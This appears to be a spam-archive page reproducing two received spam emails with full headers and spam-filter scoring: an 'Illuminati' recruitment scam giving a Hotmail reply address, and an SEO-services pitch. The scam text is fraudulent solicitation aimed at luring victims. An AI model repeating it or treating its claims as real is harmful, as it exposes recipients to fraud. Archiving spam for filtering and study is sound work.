Illuminate recruitment spam from Microsoft Outlook

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 19 Sep 2024 13:44:00 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srN4I-000000004w6-2ltX

for dave@doctor.nl2k.ab.ca;

Thu, 19 Sep 2024 13:43:58 -0600

Resent-From: The Doctor

Resent-Date: Thu, 19 Sep 2024 13:43:58 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from mail-vi1eur03on2073.outbound.protection.outlook.com ([40.107.103.73]:52865 helo=EUR03-VI1-obe.outbound.protection.outlook.com)

by doctor.nl2k.ab.ca with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384

(Exim 4.98 (FreeBSD))

(envelope-from )

id 1srM6m-00000000GSn-3t6o

for sales@nk.ca;

Thu, 19 Sep 2024 12:42:36 -0600

ARC-Seal: i=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none;

b=HQ+ktjR67F8rrHOVv1Sic1HmlNpp8wfMM/3F3FKmxiWLtZ+1x7iUT9hkHv5htJyKQzWmy+7wOu0s7vUu0JSlDCGnc3A7KrfpMPLhkAbOEJIjc/HnosyhogT9y1FMcps1/dR74iX2wCADMBR2o2Ci7+BrcTEVyjl5s9WvULMFGxiInP17kTlxQa8Zi8L4OO9uvo1Q3XiQX8e+GsOKuJ9n5b6eXzqaoEm0ikZFWdHDsiyu5HW3hWHwBfU7BURNvuQPfkBTKhFhPYli66wL3CWGhW2vqiI0/9rVDGMKV9McrxcJe5XqURir1SS5DlWESs72gIwEf48ZbzV3tbjk4Vm6Ig==

ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com;

s=arcselector10001;

h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1;

bh=7ncPTmH/XDXkY801HevUVPiQWJFRj11PnZPhBJc9I78=;

b=t/RfJIbRdnLumv55RdBOR3bsNyQqzjBtNboMLYxonWJCRVx/GYyew0shSpnbOOWK/e6G6vPNl1SHba8h0JUgrPiYhaRIElKBqnUsNroQPyLGPIUYWBdJ7q9b4vpM1o6yvRHaZo9kbhzT8LDuBe1VjM2g20HW0mB3MYJFMpDCrLwmPbmHh8nzKlNnKw3pOiRQ8RIt6daMuVSNZY6kEmTws+M5WY1T4kXrrDCeam8m74oJqCKjklmXlJ/jcCfS6rKygbjSzqxakYRMA1MVpTNX/hKXH3GYvKD8ChYMZJVCkQ7PPk209/0pJmvMxZVpdHGrU/4CGe8JZnNBWD2TABdYWA==

ARC-Authentication-Results: i=1; mx.microsoft.com 1; spf=pass (sender ip is

185.173.40.6) smtp.rcpttodomain=newhigh.com smtp.mailfrom=mew.gov.kw;

dmarc=bestguesspass action=none header.from=mew.gov.kw; dkim=none (message

not signed); arc=none (0)

DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=MEW.onmicrosoft.com;

s=selector2-MEW-onmicrosoft-com;

h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck;

bh=7ncPTmH/XDXkY801HevUVPiQWJFRj11PnZPhBJc9I78=;

b=FPXXrwYaXVwZXmQoGf0xf7Bjzbw4S8bg5eD0uNsY353QXs97HbMDLfN+CW/NAx7O8EKdtkepCGRtyKGbiRpUvoWtN93v7p3BvSa+HKwwVT5jE6lsm73PH6IpnAL48BhsDaK5qO72wg8bEDYuHd6S/W9Zvc0ef95piXkBR8zCUHE=

Received: from DU7P194CA0006.EURP194.PROD.OUTLOOK.COM (2603:10a6:10:553::15)

by GV2P194MB1965.EURP194.PROD.OUTLOOK.COM (2603:10a6:150:c2::12) with

Microsoft SMTP Server (version=TLS1_2,

cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.7982.21; Thu, 19 Sep

2024 18:40:22 +0000

Received: from DB1PEPF000509F5.eurprd02.prod.outlook.com

(2603:10a6:10:553:cafe::76) by DU7P194CA0006.outlook.office365.com

(2603:10a6:10:553::15) with Microsoft SMTP Server (version=TLS1_2,

cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.7962.29 via Frontend

Transport; Thu, 19 Sep 2024 18:40:22 +0000

X-MS-Exchange-Authentication-Results: spf=pass (sender IP is 185.173.40.6)

smtp.mailfrom=mew.gov.kw; dkim=none (message not signed)

header.d=none;dmarc=bestguesspass action=none header.from=mew.gov.kw;

Received-SPF: Pass (protection.outlook.com: domain of mew.gov.kw designates

185.173.40.6 as permitted sender) receiver=protection.outlook.com;

client-ip=185.173.40.6; helo=mail.mew.gov.kw; pr=C

Received: from mail.mew.gov.kw (185.173.40.6) by

DB1PEPF000509F5.mail.protection.outlook.com (10.167.242.151) with Microsoft

SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id

15.20.7918.13 via Frontend Transport; Thu, 19 Sep 2024 18:40:21 +0000

Received: from NCCEX01.mew.gov.kw (172.20.51.44) by NCCEX02.mew.gov.kw

(172.20.51.43) with Microsoft SMTP Server (version=TLS1_2,

cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.1.2507.37; Thu, 19 Sep

2024 21:39:25 +0300

Received: from NCCEX01.mew.gov.kw ([::1]) by NCCEX01.mew.gov.kw

([fe80::dc86:c648:dfbc:c741%5]) with mapi id 15.01.2507.037; Thu, 19 Sep 2024

21:39:25 +0300

From: Abdullah AlAjmi

Subject: Join the illuminati.

Thread-Topic: Join the illuminati.

Thread-Index: AQHbCsBT1kf+IzqTekC/xqzQVzcxsA==

Date: Thu, 19 Sep 2024 18:39:24 +0000

Message-ID:

Accept-Language: en-US, ar-KW

Content-Language: en-US

X-MS-Has-Attach:

X-MS-TNEF-Correlator:

x-originating-ip: [192.168.9.122]

Content-Type: multipart/alternative;

boundary="_000_b421efa301ad43c6854aa3354cc51bbdmewgovkw_"

MIME-Version: 1.0

To: Undisclosed recipients:;

X-EOPAttributedMessage: 0

X-MS-PublicTrafficType: Email

X-MS-TrafficTypeDiagnostic: DB1PEPF000509F5:EE_|GV2P194MB1965:EE_

X-MS-Office365-Filtering-Correlation-Id: c511d59e-4224-433d-b67c-08dcd8da84b7

X-MS-Exchange-SenderADCheck: 1

X-MS-Exchange-AntiSpam-Relay: 0

X-Microsoft-Antispam:

BCL:0;ARA:13230040|7416014|1800799024|36860700013|376014|82310400026;

X-Microsoft-Antispam-Message-Info:

=?iso-8859-1?Q?kBrFs60/wn56WvBt+5INoHS+Ajm+hOf8fa4+EAtGMf4No67nGLAylnEqIS?=

=?iso-8859-1?Q?xPxpYGTSjR+mYc98bn0ogtjTN9qP4HCORxy/DLEd9OvZml80oi3vCQzgcl?=

=?iso-8859-1?Q?4FoF6UxeineyMTWir11L37jsPgFkI40WCdtVjaaHcazv2cBEg+tiPzuiE2?=

=?iso-8859-1?Q?hU2liTlWTLtHf5UHmFH3DkW5SkBbU3YAL5UzTdjjSNrdq17/5sPFXsFIf7?=

=?iso-8859-1?Q?zxEHuqEn/CeiM2sgm6uUA1FNEMye5cjMbCKPrD2KjbWhz3T08uSZxrNoSd?=

=?iso-8859-1?Q?VNCGvnCJie7tylx/SpfiwL9x8SZkh+oJhHb7VWTSVSXthmBIeDbYyXnr9T?=

=?iso-8859-1?Q?rmGTRLO2zLBJg9iXeXXzwXySt6R0yVX9lw1StzHrVmpKNdOeQfWjMRRPuQ?=

=?iso-8859-1?Q?MX20cLG/PXjOgTI9vCrXRHk9AGpT5f1fwFT6pWOUiyQqpRkvcCGgTaqmqk?=

=?iso-8859-1?Q?8IC5xlkrGgExQGyKh0dpiLbVfwaP2Oknl2GHRF2C5p8wQ4gAPaF0J3c5VM?=

=?iso-8859-1?Q?I9pBANs0IVSxQYdc7l+CToZyN05cQ05egz05sW4WUYzCJwbeAh0MfaT2ZY?=

=?iso-8859-1?Q?n6WSw4ivJ7gaJE/z/I0+dUqJ4nKuu+ZBG2wSnCwmfh//GQSHjR1/ck1E+z?=

=?iso-8859-1?Q?RNWEEDYxIqU2mo+G1T4i6p2GhzI2f6T4OWT0/YJU38EMag0s7iP5nJMOtz?=

=?iso-8859-1?Q?R5hzkrGVCw0YMIod5PIjSUEAI7fKRpnxI3q5Q/AhIf9sAkGV6PFdWHlNoF?=

=?iso-8859-1?Q?cqoGkD0nSCoXGoEssqE3d9H4hSIgIJc1EJpTdu9od7Xci2X0y5vjFcRqwy?=

=?iso-8859-1?Q?szoFewlAtto2+XuQ/Daa7rwS4P+8uyBbnF9OdvKaVFCz6F1mOYkGkEnptR?=

=?iso-8859-1?Q?awbbHtp1mmim6cPeONd/qmBGKQ+BxchriHpB4jLiwpl0mnnm3W8/gZxvMS?=

=?iso-8859-1?Q?bwb3zQgRWkUYfLYYO3+AgBLp/+4qHvY9tJyis/+6WBpagjCtw+Slwxk1A0?=

=?iso-8859-1?Q?Fy6k8dhaVgW5PDDg3iUG/gGthqt4vTsB6o9EqYfEsM8d9MGhQ9TRxhcpIH?=

=?iso-8859-1?Q?CwXtaXShZn80V5MvQv96tlqD/d47OnlyRJ3wRFCGC8RArDuxqZXqPCk8s2?=

=?iso-8859-1?Q?fruf58fcZ6PUy3AYoAI7CTkAXUt261V1R4jiMvL7wp7FI6qHYSjjOiiiPv?=

=?iso-8859-1?Q?PdDMeABU0NoSFdUJ3ckgI/F0rGzm/+EdQsD8/XqhWDsI1ZS7Ka5iQs6hkY?=

=?iso-8859-1?Q?cyrF8ELaxWiPp73qmyTsSF7cwkjiTI4AIafwEaHEShr7VQyakvga4Hyirk?=

=?iso-8859-1?Q?3/r9nICIv9WTGqUAQZmwOUqWOAIVLgmoYgf+sdsOro3+u2jwnFmYxRiY3U?=

=?iso-8859-1?Q?HpDGtkBaS1Iv0paUtC8qrOhQpWowPFNeYF8QiM4lOOvuVmJ1INtnd+23Yw?=

=?iso-8859-1?Q?KYYnhScQ8tTTG/78n+yHjwqDLlZuJHT7fAGB8wGcyAbpvhD3InG6sxDIGU?=

=?iso-8859-1?Q?eByqfvVD8GMUdmJ0rVMDLN?=

X-Forefront-Antispam-Report:

CIP:185.173.40.6;CTRY:KW;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:mail.mew.gov.kw;PTR:mail.mew.gov.kw;CAT:NONE;SFS:(13230040)(7416014)(1800799024)(36860700013)(376014)(82310400026);DIR:OUT;SFP:1101;

X-OriginatorOrg: mew.gov.kw

X-MS-Exchange-CrossTenant-OriginalArrivalTime: 19 Sep 2024 18:40:21.6339

(UTC)

X-MS-Exchange-CrossTenant-Network-Message-Id: c511d59e-4224-433d-b67c-08dcd8da84b7

X-MS-Exchange-CrossTenant-Id: 81ae088e-5732-4a13-abc6-fe556ae9a9ed

X-MS-Exchange-CrossTenant-OriginalAttributedTenantConnectingIp: TenantId=81ae088e-5732-4a13-abc6-fe556ae9a9ed;Ip=[185.173.40.6];Helo=[mail.mew.gov.kw]

X-MS-Exchange-CrossTenant-AuthSource:

DB1PEPF000509F5.eurprd02.prod.outlook.com

X-MS-Exchange-CrossTenant-AuthAs: Anonymous

X-MS-Exchange-CrossTenant-FromEntityHeader: HybridOnPrem

X-MS-Exchange-Transport-CrossTenantHeadersStamped: GV2P194MB1965

X-Spam_score: 6.5

X-Spam_score_int: 65

X-Spam_bar: ++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: Greetings, from the illuminati world elite empire. Are you

a business Man/woman, politician, musician, student, footballer, salary earner

and you want to be rich, need protection, gain knowledge, be p [...]



Content analysis details: (6.5 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[185.173.40.6 listed in will-spam-for-food.eu.org]

[185.173.40.6 listed in will-spam-for-food.eu.org]

[185.173.40.6 listed in will-spam-for-food.eu.org]

[185.173.40.6 listed in will-spam-for-food.eu.org]

[185.173.40.6 listed in will-spam-for-food.eu.org]

[185.173.40.6 listed in will-spam-for-food.eu.org]

[185.173.40.6 listed in will-spam-for-food.eu.org]

[185.173.40.6 listed in will-spam-for-food.eu.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[will-spam-for-food.eu.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[will-spam-for-food.eu.org]

[40.107.103.73 listed in will-spam-for-food.eu.org]

[40.107.103.73 listed in will-spam-for-food.eu.org]

[40.107.103.73 listed in will-spam-for-food.eu.org]

[40.107.103.73 listed in will-spam-for-food.eu.org]

[40.107.103.73 listed in will-spam-for-food.eu.org]

[40.107.103.73 listed in will-spam-for-food.eu.org]

[40.107.103.73 listed in will-spam-for-food.eu.org]

[40.107.103.73 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[40.107.103.73 listed in dnsbl.ahbl.org]

[40.107.103.73 listed in dnsbl.ahbl.org]

[40.107.103.73 listed in dnsbl.ahbl.org]

[40.107.103.73 listed in dnsbl.ahbl.org]

[185.173.40.6 listed in dnsbl.ahbl.org]

[185.173.40.6 listed in dnsbl.ahbl.org]

[185.173.40.6 listed in dnsbl.ahbl.org]

[185.173.40.6 listed in dnsbl.ahbl.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[dnsbl.ahbl.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[dnsbl.ahbl.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[dnsbl.ahbl.org]

[2603:10a6:10:553:0:0:0:15 listed in]

[dnsbl.ahbl.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[dnsbl.ahbl.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[dnsbl.ahbl.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[dnsbl.ahbl.org]

[2603:10a6:10:553:cafe:0:0:76 listed in]

[dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[40.107.103.73 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[40.107.103.73 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[40.107.103.73 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[40.107.103.73 listed in dnsbl.ahbl.org]

-0.2 RCVD_IN_MSPIKE_H2 RBL: Average reputation (+2)

[40.107.103.73 listed in wl.mailspike.net]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

-0.0 SPF_PASS SPF: sender matches SPF record

0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid

0.0 ARC_VALID Message has a valid ARC signature

-0.1 DKIM_VALID Message has at least one valid DKIM or DK signature

0.0 ARC_SIGNED Message has a ARC signature

0.2 MR_NOT_ATTRIBUTED_IP Beta rule: an non-attributed IPv4 found in

headers

1.5 GR_DOMAIN_UNDISC1 To contains undisclosed recipient (undisc)

0.0 HTML_MESSAGE BODY: HTML included in message

-0.0 T_SCC_BODY_TEXT_LINE No description available.

Subject: {SPAM?} Join the illuminati.



--_000_b421efa301ad43c6854aa3354cc51bbdmewgovkw_

Content-Type: text/plain; charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable







Greetings, from the illuminati world elite empire. Are you a business Man/w=

oman, politician, musician, student, footballer,

salary earner and you want to be rich, need protection, gain knowledge, be =

powerful and famous in life.

You can achieve your dreams by being a member of the great illuminati empir=

e to earn yourself lot of benefit,

With this all your dreams and heart desire can be fully accomplish.



With this brief summary, if you are interested to become a member of the gr=

eat

illuminati then get back to us for more information and explanations about =

joining the illuminati.

kindly reply us back on our direct recruitment email only at: theilluminati=

recruitment@hotmail.com

Please note, Kindly make sure all your response are send directly to the em=

ail stated above only at:> theilluminatirecruitment@hotmail.com

For more instructions on our membership process.

Note: Some email providers incorrectly place official Illuminati messages i=

n their spam / junk folder or promotion folder.

This can divert and exclude our responses to your emails.



The Illuminati.



---------------------------------------------------------------------------=

----------------------------------------- "The contents of this e-mail incl=

uding the contents of the attachment(s), if any are privileged and may cont=

ain confidential material of Ministry of Electricity & Water, Kuwait and sh=

ould not be disclosed to, used by, circulated or copied in any manner or re=

lied upon by anyone other than the intended addressee(s). In case you are n=

ot the intended addressee and have received this e-mail by error, you shoul=

d immediately notify the sender and delete this message and all attachments=

from your system. The views expressed in this e-mail including the attachm=

ent(s) if any, are those of the individual sender, except where the sender =

expressly and with proper authority, states them to be the views of Ministr=

y of Electricity & Water, Kuwait. This e-mail including attachment/(s), if =

any, is believed to be free of virus. However, it is the responsibility of =

the recipient to ensure that it is virus free. E-mails cannot be guaranteed=

to be secure or error free as the message and any attachments could be int=

ercepted, corrupted, lost, delayed, incomplete or amended. Ministry of Elec=

tricity & Water, Kuwait is not responsible for any loss or damage arising i=

n any way from its use."



--_000_b421efa301ad43c6854aa3354cc51bbdmewgovkw_

Content-Type: text/html; charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable








1">








r: rgb(0, 0, 0); font-family: Calibri, Helvetica, sans-serif, "EmojiFo=

nt", "Apple Color Emoji", "Segoe UI Emoji", NotoCo=

lorEmoji, "Segoe UI Symbol", "Android Emoji", EmojiSymb=

ols;">














:rgb(0,0,0); font-family:Calibri,Helvetica,sans-serif,"EmojiFont"=

,"Apple Color Emoji","Segoe UI Emoji",NotoColorEmoji,&q=

uot;Segoe UI Symbol","Android Emoji",EmojiSymbols">



Greetings, from the illuminati world elite empire. Are you a busine=

ss Man/woman, politician, musician, student, footballer,


salary earner and you want to be rich, need protection, gain knowledge, be =

powerful and famous in life.


You can achieve your dreams by being a member of the great illuminati empir=

e to earn yourself lot of benefit,


With this all your dreams and heart desire can be fully accomplish.





With this brief summary, if you are interested to become a member of the gr=

eat


illuminati then get back to us for more information and explanations about =

joining the illuminati.


kindly reply us back on our direct recruitment email only at: theilluminati=

recruitment@hotmail.com  


Please note, Kindly make sure all your response are send directly to the em=

ail stated above only at:> theilluminatirecruitment@hotmail.com  
r>

For more instructions on our membership process.


Note: Some email providers incorrectly place official Illuminati messages i=

n their spam / junk folder or promotion folder.


This can divert and exclude our responses to your emails.





The Illuminati.













---------------------------------------------------------------------------=

----------------------------------------- “The contents of this e-mai=

l including the contents of the attachment(s), if any are privileged and ma=

y contain confidential material of Ministry

of Electricity & Water, Kuwait and should not be disclosed to, used by=

, circulated or copied in any manner or relied upon by anyone other than th=

e intended addressee(s). In case you are not the intended addressee and hav=

e received this e-mail by error, you

should immediately notify the sender and delete this message and all attac=

hments from your system. The views expressed in this e-mail including the a=

ttachment(s) if any, are those of the individual sender, except where the s=

ender expressly and with proper

authority, states them to be the views of Ministry of Electricity & Wa=

ter, Kuwait. This e-mail including attachment/(s), if any, is believed to b=

e free of virus. However, it is the responsibility of the recipient to ensu=

re that it is virus free. E-mails cannot

be guaranteed to be secure or error free as the message and any attachment=

s could be intercepted, corrupted, lost, delayed, incomplete or amended. Mi=

nistry of Electricity & Water, Kuwait is not responsible for any loss o=

r damage arising in any way from its

use.”







--_000_b421efa301ad43c6854aa3354cc51bbdmewgovkw_--

Web / SEO / App spam from Yahoo! Mail

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 19 Sep 2024 09:29:00 -0600

Received: from sonic305-20.consmr.mail.sg3.yahoo.com ([106.10.241.83]:36914)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_128_GCM_SHA256

(Exim 4.98 (FreeBSD))

(envelope-from )

id 1srJ5R-000000001q4-1fpW

for dave@doctor.nl2k.ab.ca;

Thu, 19 Sep 2024 09:28:57 -0600

DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s2048; t=1726759609; bh=y7G6wiLo/mvkt0SrvqSOJ5411/HkbXHTBzc5Kfd/TyI=; h=Date:From:In-Reply-To:References:Subject:From:Subject:Reply-To; b=j80vDSjDfCVkSzzSACMLxFu1zIqP/O/m4jYewBRzzjx8JxxCVvo+s7C0FMxXTqwcE8b5FluoCZ4A0y447vzqfIAEpN6mzrQHWpMcNYAKi6jw51+nIsuSVcN0XYtSgmrL5jeqLSZ1DQuCXl4udqAvq6okdxOGklS5anGJQlWZ/ejV1wbRgyQPAHxuChirvWrTETNYsrklG1l46TXTP8Xi7NxBiWZL8Usg6FK2vkhNIdJbB0hRwP0jEmxCpf1sV5VRdguoLs2HcBTTiqxDmxNUFOFNrHRWEJSWBtyi1q+PNrYDxJJvnAvCAA323/qDOcBEA+K44aRSB2YDimqpTNsqFg==

X-SONIC-DKIM-SIGN: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s2048; t=1726759609; bh=cOr6+UGYIpRJCU80j3g/M828NADb8sxZoFfDe2CHiTM=; h=X-Sonic-MF:Date:From:Subject:From:Subject; b=dIYwByrGH5hhf4CJUMwDrxGAypZWMzLZ88iarI278JssKf8cbvbgfLxkycArv/w8c4RszZ8/D0VQ7JRfCTHnr96qIgJpCGsWPB4DNM++SITMvIxhVHcPQvnPL2QMubOjoKwtK55XyoUeYNHvDmZR2uBeZeO5cSk1/cE3JpfVbvSIOag9wX3UEAQZNTlEJ5Bpxo0vd7f5ldp3HWJ92KMPfV7dQ0wE3WQL49toYsiTNY/MyZSwTQYifZkLE71GWaeVYJCYWl6yd6lcOkxsf+8amJ4qTSEjnxXAFjjDuasoRDua5SujWW2Jshu/AYsxSYteQ54MAjUonHxlSaV9iTdgzg==

X-YMail-OSG: TZaaj9sVM1kdbQxd6o.hCQs2JUZ8V6y5urjpY42j9i7GKKzr7oayBAqLhyfkZUu

CjkjS1zWjStHA0Xc8Ip2.f.w..sz2h9EMnNRCBjCvX3yGrVK6CeCeBsKY5ODq1kndqYFH2mXH0wF

OIHY4FNxWI0O.kl9glX5rDdVhd8P_sA60vjXehDSLsivD7Qy02jyS8kCkW7ocdQC13wWIKpDm43A

DS4mP9sr87ZaSKtewmSdikJhSO35FkSVf2T7ywzItyUpJ5GfY3vDc9sLuLTu6.sShm7xCukVGTFw

R1JA35ADzIYazlT20MLX6qP8MdVZcGeSWRGnnYT.YvOh6tF3ijNORLf0X.bkef_nAhJSgiizY0Ju

_jEeqqJSO8aj0CsPDJabU9zreFwXDKNyp4yjTub7GpCl5t8HQx4MN5IpVPtnA6jjRuFiMuuv6ua5

N_iK01MX7GR9t1Y7_8prxqTOdGjhbFHjxM4MyJun8MsvArOQ.2zounmxJSZl1haKwkQ4oB5o.0zj

_pyUvEjfNCLwNbYgdevYWHYXZ_t7FEvj7awcwS8RoUz6PbIOCiieP11MIxDhPAMenqRT12Ucoofx

02QyX85FUBSMrmQMZ.fQDd_8_qC08MXMzYvm7egi4voC5gojV3TQICOCcWhs_pOJ2a0FZYW2e5.N

RXMWQ4xHaxnQ1MzBxYefXtVsOeEj6FgYijlm5jGmaQ1mxwnAAAUfTTp.L7tH3dM2dC2Vp01n958t

HpEkzGJimALJ1neZgqgm5oM37ORC6L6PRAtCyva3oBsbtBylynnixMMXnTOjkC51LZGiWBdYuagR

VCIy0o9s_POOEzVKo_kZWEl2Z_Kad3tBtQXVFLTf0jaPJfXOE2beWGBetVBnn4.8GbzCgUheAwi6

c74HTlSjSvsilPV0xuKerJEosQuLHbI.QVzEBu3cD4P1mkoVF9k6XdHnWkFnt8dDAD6vzSEef7jy

vtJmoZrHRlZQVJz0zIhmqiXJvxy_53AvVyXUl9fAD0UB0ukgGC9C_xPXitO53HzSYlJPHw7t80xk

sMTP1x.8Q13usLLT0zeOO71bSwig_HKaT6hV.91fdb.7eKbiuxo4TcKgXqrodLCcMHjsYDZLL8a6

ouQrdsTGaN6Yg0UWwk.KQexTuzxTtQhQAqEoNdNOlVzqTQF4xwJrvx1I.OoSAhkZ5NTMK_.jtuVz

R3QpNNIz8r3RwLswnOu86JAuPHW0VWLa1N7MeFpYdLbGrc6y1W7Xi.LssHrlYxyDsKnHfAPXoxY3

GTcSkC38sT2tvgL3VCvOeZxv7gUksusxmjKZ0u50joCGZAcKFAYPdRkiSf4PKOAaBrmUDt4nCVWE

dt7sIOaucgncD9KwYHKUq649sxnbwAfZSzytjFmUkdPmFSbbg8xjx1IlPbOEuRw5GnC_LAfwuTLX

c2d3m7CzRtNWbbUVilJ03izOyjfXOYhNyXci1n7xwiqB8kOLGJd2xLmiaO..RMKeqOZ_Q9X8Y.xS

oOf45scJTeEVxdWPGmgo4d3lQwQaVpLjacqKLqQDEZzwF4za31eQVWSG935cX8TFVAA2bP9.8m.z

fhHlPY6tQtKofK01FSg0hAOd2tUqrGBZ2jfvle42j2hoGhT1oKBEvC.Wb87gT0uMiA1BZiQruJzq

552MGhutRwSob2pc8hT_80X.n5LUNp5ajdCBWyGM6ZpHexUhBcG5qpaBqBjpLEGZx3UDKtht64uu

PI1VHllpiQz_t1ovRNkEz.3dFxEd57Dpc31wDftb5OFkbrz12qvAYkD6Yan2Rqi1UyPh6tTAVPVn

O3w7NNMKW1V5NT7JCfjGzyVSdRc_xulmwX86GYqwjcMPmRovod9wEJs52IQFOvfTZ5X3VJYLsLyJ

ExsryGkiSPFI_XCW93GGc.qlM6CmYms7.vXKTMyrUJ5dEPXkF7T3PDzfEz.DoR_oXUv0fDBzXtk.

bCiD1NYqRnhRdOYPLIsEAC44RiU1IL5hSTKDncg7N8VDjzZZH2ha1YbqwNJ28TLQNR5IdeHp3mJ_

bX3.ydom8otrl5UVRfxiqky.VGX.UvQtzjTCKeNJLkd4g1hb4IHcc.Gjeb.1aUt_wfiRKcAezcs3

FMQBiRH8o_LaFJaLqzXPH9AZgCUYZyUo1X.yQBZOs5IJHlbBRTmtn52FwY_f_D8dxpzqFMyPzAlm

mOADQw8wKq9xSmrDx_LoK5FbrsO3UrBfjt0eP2rgpV2Ge89.pNKuet5Tj9N06UVzZMnvWs3fGHeA

08egcIBigUtRn3lQmmJPAaO..o.mgACSvpuUJMK2Q4Jbz

X-Sonic-MF:

X-Sonic-ID: 8eeeac47-c918-4748-bf0e-8bf01adefdaa

Received: from sonic.gate.mail.ne1.yahoo.com by sonic305.consmr.mail.sg3.yahoo.com with HTTP; Thu, 19 Sep 2024 15:26:49 +0000

Date: Thu, 19 Sep 2024 15:26:49 +0000 (UTC)

From: Parul Kumar

Message-ID: <497677718.6233846.1726759609566@mail.yahoo.com>

In-Reply-To: <1803133595.6241801.1726759559762@mail.yahoo.com>

References: <150380792.287445.1726759417327.ref@mail.yahoo.com> <150380792.287445.1726759417327@mail.yahoo.com> <1635391093.6238393.1726759450037@mail.yahoo.com> <1683073657.4114215.1726759489478@mail.yahoo.com> <1803133595.6241801.1726759559762@mail.yahoo.com>

Subject: Re: Needful Response!

MIME-Version: 1.0

Content-Type: multipart/alternative;

boundary="----=_Part_6233845_746359654.1726759609565"

X-Mailer: WebService/1.1.22645 YMailNorrin

X-Spam_score: 7.9

X-Spam_score_int: 79

X-Spam_bar: +++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: Hi, I was checking your website on behalf this email "" and

see you havea good design and it looks great, but it's not ranking on Google

and othermajor search engine. We can place your website on Google's 1st page

(Yahoo, etc.)



Content analysis details: (7.9 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[106.10.241.83 listed in will-spam-for-food.eu.org]

[106.10.241.83 listed in will-spam-for-food.eu.org]

[106.10.241.83 listed in will-spam-for-food.eu.org]

[106.10.241.83 listed in will-spam-for-food.eu.org]

[106.10.241.83 listed in will-spam-for-food.eu.org]

[106.10.241.83 listed in will-spam-for-food.eu.org]

[106.10.241.83 listed in will-spam-for-food.eu.org]

[106.10.241.83 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[106.10.241.83 listed in dnsbl.ahbl.org]

